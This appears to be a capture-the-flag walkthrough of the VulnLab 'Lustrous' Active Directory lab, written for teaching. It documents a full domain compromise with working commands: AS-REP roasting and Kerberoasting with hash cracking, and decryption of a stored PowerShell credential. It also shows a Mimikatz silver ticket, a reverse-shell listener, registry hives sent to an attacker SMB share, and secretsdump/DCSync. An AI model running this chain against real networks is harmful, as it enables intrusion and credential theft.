VL-Lustrous

,

Vulnlab Lustrous: Exploiting AD Privilege Escalation Through Credential Extraction

In this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate the “Lustrous” domain environment by exploiting a series of vulnerabilities leading to complete domain compromise. Starting with anonymous FTP access and Kerberos pre-authentication weaknesses, we’ll progress through lateral movement techniques, credential extraction from encrypted files, and ultimately achieve domain administrator access via a silver ticket attack and DCSync exploitation.
This penetration test showcases several real-world Active Directory attack vectors including ASREPRoasting, credential decryption from serialized PowerShell objects, Kerberos silver ticket forgery, and leveraging backup privileges for extracting domain hashes. The techniques demonstrated highlight common security misconfigurations in Windows environments that penetration testers should look for during assessments.

Initial Reconnaissance

The first step in our penetration test was gathering information about the target system using an Nmap scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-18 11:52:41Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSDC
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusDC.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-18T11:53:35+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60046/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
60047/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60086/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60103/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Anonymous FTP Enumeration

The Nmap scan revealed Anonymous FTP login was allowed, so we accessed it:

1
ftp 10.10.181.149

Potential User Accounts

From the FTP server, we discovered several user accounts:

1
2
3
4
ben.cox
rachel.parker
tony.ward
wayne.taylor

Kerberos User Enumeration

Next, we used Kerbrute to enumerate users in the Active Directory domain:

1
./kerbrute userenum -d lustrous.vl ~/Downloads/usernames.txt --dc 10.10.181.149

No Pre-Authentication Required

Kerberoasting Attack

We used Impacket to grab the hash since hashcat doesn’t support the $18$ format:

1
impacket-GetNPUsers lustrous.vl/ -usersfile ~/Downloads/usernames.txt -dc-ip 10.10.181.149

Then we cracked the hash:

1
hashcat hash2020.txt /usr/share/wordlists/rockyou.txt

Cracked Hash
Successfully obtained credentials:

1
ben.cox : <PASS>

Password Spraying and User Enumeration

Don’t forget to spray the password across other accounts!
Access to Both Machines

1
netexec smb 10.10.181.149 -u 'ben.cox' -p '<PASS>' --users

All Users in Domain
Complete list of domain users:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Administrator
Guest
krbtgt
Deborah.Harris
Duncan.Spencer
Brenda.Andrews
Rachel.Parker
Wayne.Taylor
Hugh.Wilkinson
Tracy.Roberts
Bradley.Hancock
Tony.Ward
Joanna.Hall
Marian.Elliott
Ben.Cox
Joanna.Harvey
Jeremy.Clark
Allan.Parker
Mitchell.Fuller
Colin.Dodd
Liam.Atkinson
Michelle.John
Iain.Evans
Donna.Collins
Cameron.Walsh
svc_web
svc_db

Service Account Enumeration and Attack

Using Impacket to find service accounts with SPNs:

1
impacket-GetUserSPNs lustrous.vl/ben.cox:<PASS> -dc-ip 10.10.172.117 -request

Service Account Hash
Successfully cracked the svc_web account password:

1
svc_web : <PASS>

BloodHound Collection

1
netexec ldap 10.10.172.117 -u 'svc_web' -p '<PASS>' --bloodhound --dns-server 10.10.172.117 -c ALL --dns-tcp

Lateral Movement to Member Server

We discovered that Ben.Cox has WinRM access to the LusMS.lustrous.vl machine:

1
netexec winrm 10.10.172.118 -u ben.cox -p '<PASS>'

WinRM Access

Privilege Escalation via Encrypted Credentials

Found admin.xml file on the user’s desktop:
Admin XML File

1
download admin.xml

This XML output contains a serialized PowerShell PSCredential object with encrypted credentials for LUSMS\Administrator.
XML Opened
To extract the password, we used a HoaxShell to get an interactive PowerShell session:

1
hoaxshell -s 10.8.5.195 -p 4444

After connecting to the desktop directory, we executed these PowerShell commands:

1
2
3
4
$cred = Import-Clixml -Path .\admin.xml
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($cred.Password)
$PlainPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
Write-Output "Decrypted password: $PlainPassword"

This returned the local Administrator password for LusMS.lustrous.vl.
Verifying access with the obtained credentials:

1
netexec smb 10.10.172.118 -u Administrator -p '<PASS>' -d .

Admin Access on Member Server

Pivoting to Domain Controller

First, we established an RDP session to LusMS using the administrator account:

1
xfreerdp /v:10.10.212.102 /u:Administrator /p:'<PASS>'

Port 443 on DC
We logged in using Ben.Cox’s credentials:
Useful Information

Creating a Silver Ticket

Since we had the web service account password, we created a silver ticket to exploit the website hosted on the DC and access other users’ notes.
First, we uploaded Mimikatz to LusMS and ran it as SYSTEM to disable real-time monitoring (via the RDP session):
Mimikatz
We needed the domain SID and the RC4 hash of the web_svc account:

1
impacket-lookupsid lustrous.vl/ben.cox:'<PASS>'@10.10.246.101

Domain SID
Domain SID: S-1-5-21-2355092754-1584501958-1513963426
We then converted the web_svc password to MD4 format with UTF-16LE encoding to get the RC4 hash using an online tool.
In Mimikatz, we executed:

1
kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:LusDC.lustrous.vl /service:HTTP /rc4:<WEB_SVC HASH> /user:tony.ward

Ticket Key
We then switched to a CMD session and ran:

1
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" --auth-server-whitelist="LusDc.lustrous.vl" http://LusDc.lustrous.vl

This opened the Edge browser and authenticated using our forged ticket:
Tony's Password

1
tony.ward : <PASS>

DCSync Attack via Backup Privileges

Tony.Ward is a member of Backup Operators, which has SeBackup and SeRestore privileges allowing access to any file, including ntds.dit. As we cant winrm with Tony we will use smb to get SAM,SYSTEM and SECURITY hives.
First, we started an SMB server:

1
impacket-smbserver hello ./share -smb2support

Then, we extracted the registry hives:

1
2
3
reg.py lustrous.vl/tony.ward:<PASS>@10.10.246.101 save -keyName 'HKLM\SAM' -o '\\10.8.5.195\hello'
reg.py lustrous.vl/tony.ward:<PASS>@10.10.246.101 save -keyName 'HKLM\SYSTEM' -o '\\10.8.5.195\hello'
reg.py lustrous.vl/tony.ward:<PASS>@10.10.246.101 save -keyName 'HKLM\SECURITY' -o '\\10.8.5.195\hello'

We then dumped the secrets:

1
secretsdump.py -sam ./SAM.save -system ./SYSTEM.save -security ./SECURITY.save local

Machine Account Hash
With the DC machine account hash, we could now dump all domain hashes:

1
secretsdump.py 'LusDC$'@10.10.246.101 -hashes':<HASH>'

This returned the domain administrator hash, allowing us to access the DC via WinRM and capture the flag.

https://api.vulnlab.com/api/v1/share?id=3e1b2cf9-e911-4b8c-a741-d4d862dba811